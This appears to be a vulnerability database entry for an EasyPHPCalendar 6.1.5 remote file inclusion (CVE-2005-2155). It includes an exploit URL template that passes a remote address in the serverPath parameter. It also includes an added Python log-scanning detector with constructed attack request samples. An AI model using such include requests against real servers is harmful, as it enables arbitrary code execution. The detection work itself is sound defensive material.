EasyPHPCalendar serverPath Remote File Inclusion Vulnerability

Vulnerability ID: 1108909
Vulnerability type: Unknown
Published: 2005-07-04
Updated: 2005-07-06
CVE ID: CVE-2005-2155
CNNVD-ID: CNNVD-200507-058
Platform: PHP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/25932
https://www.securityfocus.com/bid/88950
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-058
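|Vulnerability details
EasyPHPCalendar is a web calendar tool. EasyPHPCalendar 6.1.5 and earlier versions contain a PHP remote file inclusion vulnerability. A remote attacker can execute arbitrary code via the serverPath parameter.
|Exploit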
source: http://www.securityfocus.com/bid/14131/info
    
EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
    
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
    
These issues reportedly affect EasyPHPCalendar version 6.1.5; other versions may also be vulnerable. 

http://www.example.com/calendar/setup/setupSQL.php?serverPath=http://www.example.com/[remote code]
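
A detection sketch for the request pattern above, added here as an example and not part of the original advisory or of EasyPHPCalendar: it scans web server access logs for PHP requests that set `serverPath`, and because the advisory reports multiple include issues it checks every `.php` script rather than only `setupSQL.php`. It assumes combined log format; the log lines, the `host.invalid` name and the verdict labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "serverpath"  # parameter named in the advisory, compared case-insensitively
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# URL scheme or stream wrapper ("http:", "ftp:", "php:"), "//host", or a UNC path
REMOTE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding, e.g. %2568ttp -> %68ttp -> http."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (client, script, value, verdict) for each request setting serverPath."""
    findings = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(".php"):
            continue
        for key, raw in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() != PARAM:
                continue
            value = fully_decode(raw)  # parse_qsl already decoded one layer
            # Assumption: any client-supplied serverPath deserves review;
            # a remote-looking value is the pattern the advisory describes.
            verdict = "remote-include" if REMOTE.match(value) else "path-override"
            findings.append((client, url.path, value, verdict))
    return findings

# Constructed sample log lines (combined log format), not taken from the page.
SAMPLE_LOG = '''\
203.0.113.5 - - [06/Jul/2005:10:01:02 +0000] "GET /calendar/setup/setupSQL.php?serverPath=http://host.invalid/x HTTP/1.1" 200 512
203.0.113.5 - - [06/Jul/2005:10:01:09 +0000] "GET /calendar/setup/setupSQL.php?serverPath=%2568TTP%253A%252F%252Fhost.invalid%252Fx HTTP/1.1" 200 512
198.51.100.7 - - [06/Jul/2005:10:02:00 +0000] "GET /calendar/index.php?serverPath=/var/www/calendar/ HTTP/1.1" 200 900
198.51.100.7 - - [06/Jul/2005:10:02:30 +0000] "GET /calendar/index.php?mo=7&yr=2005 HTTP/1.1" 200 900
192.0.2.44 - - [06/Jul/2005:10:03:00 +0000] "POST /calendar/setup/setupSQL.php?x=1&serverPath=%2F%2Fhost.invalid%2Fx HTTP/1.1" 200 10
'''
```

Query-string scanning only sees values sent in the URL; a `serverPath` value sent in a POST body would need request-body logging or a WAF rule to be visible.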
|Affected products
EasyPHPCalendar EasyPHPCalendar 6.1.5
|References

Source: SECUNIA
Name: 15893
Link: http://secunia.com/advisories/15893
